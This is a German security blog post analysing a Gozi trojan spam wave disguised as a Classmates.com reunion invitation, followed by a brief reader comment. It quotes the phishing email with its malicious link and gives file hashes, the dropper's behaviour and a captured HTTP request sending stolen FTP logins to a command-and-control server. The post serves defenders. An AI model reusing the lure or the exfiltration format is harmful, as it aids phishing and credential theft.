Seit heute Morgen verbreitet sich der Trojaner Gozi, welcher uns bereits vom letzten Jahr her bekannt ist (siehe Post “Porno-Mails verbreiten Malware in der Schweiz” und “Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins”), über eine neue Spam-Welle:
Betreff: Classmates Important Meeting Information
We are pleased to announce Class Reunion on January 24, 2009.
“Please join us for a night of fun as we celebrate our 2009 Year Class Reunion.
We don’t want to let another year go by without the opportunity for all of us to get together, reminisce about old times and learn about what our old friends have been up to.”
Proceed to view Your message:
http://classmates.profile.OnlineServlet.user-m5wy5irlu.coreupdtates.com/login_video737.htm?/default/LOGIN=rly3pelivndgc0y
With best regards, Wilda Groves. Customer Service Department.
Copyright 1995-2008 Classmates Online, Inc. All Rights Reserved.
E-Mail Text sowie die Absender E-Mail Adresse (personalcenter@classmates.com) ist jeweils gleich. Der Betreff der Spam-Mails unterscheidet sich jedoch:
Im Unterschied zur letzten Spam-Welle zielt der Trojaner dieses mal nicht explizit auf die Schweiz ab. Das E-Mail enthält jeweils einen langen Link auf eine der folgenden Webseiten:
Die Domains werden wieder einmal mehr auf einem FastFlux Botnet gehostet (mit einer TTL von 1800 Sekunden):
Besucht man eine der in den Spam-Mails angepriesenen Webseiten, wird dem Besucher sofort eine EXE-Datei zum download angeboten:
Die angebotene Datei ADMedia_Player.exe enthält den Trojaner Gozi, welcher derzeit von den Antivirenherstellern noch nicht all zu gut erkannt wird:
File size: 14933 bytes
MD5…: 3427ffd0f5861a8170f7225395b7d3c3
SHA1..: 53bc0d796cd603952cc9ab6c3f5065c3992711ca
Erkennungsrate: 9/39 (23.08%)
Nach ausführen der EXE-Datei nistet sich der Trojaner (wie auch letztes mal schon) im WINDOWS-Verzeichnis des Systems ein:
C:\WINDOWS\new_drv.sys
Kurz danach lädt der Trojaner weiteren Schadcode von resetflash.com nach (welche ebenfalls auf einem FastFlux Botnet gehostet ist):
Filename: flash.exe
File size: 36864 bytes
MD5…: 87255d2928f3abfcdecc6255a84b0196
SHA1..: 334ccfbeeea45e9c73cc7e3a2a3c6f0003d14987
Erkennungsrate: 3/39 (7.69%)
Der Trojaner zeichnet nun sämtliche HTTP, HTTPS und FTP Logins auf, welche vom infizierten Rechner aus gemacht werden und sendet die gesammelten credentials an einen Command&Controll Server (91.211.65.30 – Ural Industrial Limited Company RU):
Content-Type: multipart/form-data;
User-Agent: IE
Host: 91.211.65.30
Content-Length: 363
Cache-Control: no-cache
—————————-6e6ea6e6ea6e6ea
Content-Disposition: form-data; name=”upload_file”;
Content-Type: application/octet-stream
URL: sniffer_ftp
ftp_server=ftp.serverdesopfers.ch&ftp_login=username&ftp_pass=passwort&version=0
—————————-6e6ea6e6ea6e6ea–
Fazit
Da das E-Mail in englisch verfasst ist sowie viele Schweizer Internet Nutzer den Dienst “Classmates.com” nicht einmal kennen, dürften nur wenige Rechner in der Schweiz infiziert worden. Um eine Infektion vorzubeugen empfiehlt es sich für Unternehmen trotzdem, den Zugang zu folgenden Domains / IP Adressen zu unterbinden:
Hallo
Danke für den Post.
Das ist nach meiner Erfahrung das erste Spam / Virus E-Mail, das in perfektem Englisch verfasst wurde. Bisher konnte man solche Sachen mit Leichtigkeit alleine aufgrund der holprigen Sprache erkennen.
Ich vermute, dass mehr englischsprachige Nutzer auf solche Mails reinfallen werden.
Grüsse
Mark